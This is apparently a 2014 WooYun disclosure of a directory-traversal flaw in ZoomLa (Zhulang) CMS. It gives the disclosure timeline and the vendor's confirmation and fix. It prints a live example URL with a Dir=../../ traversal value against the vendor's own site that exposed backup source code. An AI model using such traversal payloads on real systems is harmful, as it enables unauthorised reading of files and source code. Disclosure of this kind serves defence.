[公开漏洞]逐浪CMS设计缺陷遍历目录(官网备份源码泄漏)
-
来源:WooYun 浏览:1235次 时间:2014-05-28
逐浪CMS设计缺陷遍历目录(官网备份源码泄漏)
相关厂商:
逐浪CMS
漏洞作者:xlz0iza1
提交时间:2014-02-27 09:20
公开时间:2014-05-28 09:21
漏洞类型:设计错误/逻辑缺陷
危害等级:中
自评Rank:10
漏洞状态:
厂商已经确认
漏洞来源:http://www.wooyun.org
Tags标签:
无
漏洞详情
披露状态:
2014-02-27:细节已通知厂商并且等待厂商处理中
2014-02-27:厂商已经确认,细节仅向厂商公开
2014-03-02:细节向第三方安全合作伙伴开放
2014-03-09:细节向核心白帽子及相关领域专家公开
2014-03-19:细节向普通白帽子公开
2014-04-08:细节向实习白帽子公开
2014-05-28:细节向公众公开
URL:http://www.zoomla.cn/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
Url:http://demo.zoomla.cn/Edit/ShowEdit.aspx?Dir=&OpenWords=TxtTagKey
上次提交没有截图完整这次
Dir=.参数没有严格处理, 可以跳出upload目录读取到其他目录文件。
导致可以遍历目录。攻击者可以收集信息进一步攻击。


目录浏览,泄漏官方备份源码。

修复方案:
可以说不是漏洞把。
版权声明:转载请注明来源 xlz0iza1@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:20
确认时间:2014-02-27 16:52
厂商回复:马上处理
最新状态:2014-02-27:收到此问题,已经修复,感谢。
2014-04-13:已经于最新的x1.5修缮完毕。